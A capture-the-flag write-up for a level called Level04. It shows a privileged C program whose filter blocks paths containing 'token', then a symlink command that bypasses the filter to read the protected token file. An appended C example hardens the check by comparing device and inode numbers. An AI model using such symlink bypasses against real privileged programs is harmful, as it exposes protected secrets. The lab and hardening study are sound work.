In Level04 we are given the source code of a program owned by the flag04 user:

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>
#include <err.h>   /* err() */

int main(int argc, char **argv, char **envp)
{
  char buf[1024];
  int fd, rc;

  if(argc == 1) {
    printf("%s [file to read]\n", argv[0]);
    exit(EXIT_FAILURE);
  }

  /* The filter inspects only the path string given on the command line */
  if(strstr(argv[1], "token") != NULL) {
    printf("You may not access '%s'\n", argv[1]);
    exit(EXIT_FAILURE);
  }

  /* open() follows symbolic links */
  fd = open(argv[1], O_RDONLY);
  if(fd == -1) {
    err(EXIT_FAILURE, "Unable to open %s", argv[1]);
  }

  rc = read(fd, buf, sizeof(buf));

  if(rc == -1) {
    err(EXIT_FAILURE, "Unable to read fd %d", fd);
  }

  write(1, buf, rc);
}

The program opens the file passed as its first argument unless the name contains the string token, so we cannot use it to open our target token file ... or can we?
The check only looks at the path string in argv[1], while open() follows symbolic links, so solving the level turned out to be as easy as creating a symlink with a different name:

~$ /home/flag04/flag04 /home/flag04/token  
You may not access '/home/flag04/token'  
~$ ln -s /home/flag04/token nekot  
~$ /home/flag04/flag04 nekot
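
A hardened form of the check, as an added example that is not part of the original post or the level's code: instead of filtering on the name, it opens the file and compares the opened descriptor's device and inode with the protected file. The function names, the temporary directory and the file names other than token and nekot are assumptions made for this sketch.

```c
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The level's check: looks only at the path string. */
int name_check_allows(const char *path) { return strstr(path, "token") == NULL; }

/* Hypothetical hardened check: open first, then compare the opened file's
 * device/inode with the protected file. Returns an fd, or -1 if refused. */
int open_unless_protected(const char *path, const char *protected_path)
{
    struct stat want, got;
    int fd = open(path, O_RDONLY);
    if (fd == -1)
        return -1;
    /* Fail closed when either file cannot be identified. */
    if (fstat(fd, &got) == -1 || stat(protected_path, &want) == -1 ||
        (want.st_dev == got.st_dev && want.st_ino == got.st_ino)) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed fixture: temp dir with "token", a symlink "nekot" to it, and an
 * unrelated "notes". Returns 1 when only the identity check stops the symlink. */
int demo(void)
{
    char dir[] = "/tmp/l04demoXXXXXX", tok[64], lnk[64], oth[64];
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(tok, sizeof tok, "%s/token", dir);
    snprintf(lnk, sizeof lnk, "%s/nekot", dir);
    snprintf(oth, sizeof oth, "%s/notes", dir);
    close(open(tok, O_CREAT | O_WRONLY, 0600));
    close(open(oth, O_CREAT | O_WRONLY, 0600));
    if (symlink(tok, lnk) == -1) return -1;
    int bypass = name_check_allows(lnk);          /* name filter is fooled */
    int fd_lnk = open_unless_protected(lnk, tok); /* identity check is not */
    int fd_oth = open_unless_protected(oth, tok); /* other files still open */
    if (fd_oth != -1) close(fd_oth);
    unlink(lnk); unlink(tok); unlink(oth); rmdir(dir);
    return bypass && fd_lnk == -1 && fd_oth != -1;
}

int main(void) { printf("symlink bypass refused: %d\n", demo()); return 0; }
```

Because the comparison is made on the already-opened descriptor, it also refuses hard links to the protected file and leaves no window between the check and the open.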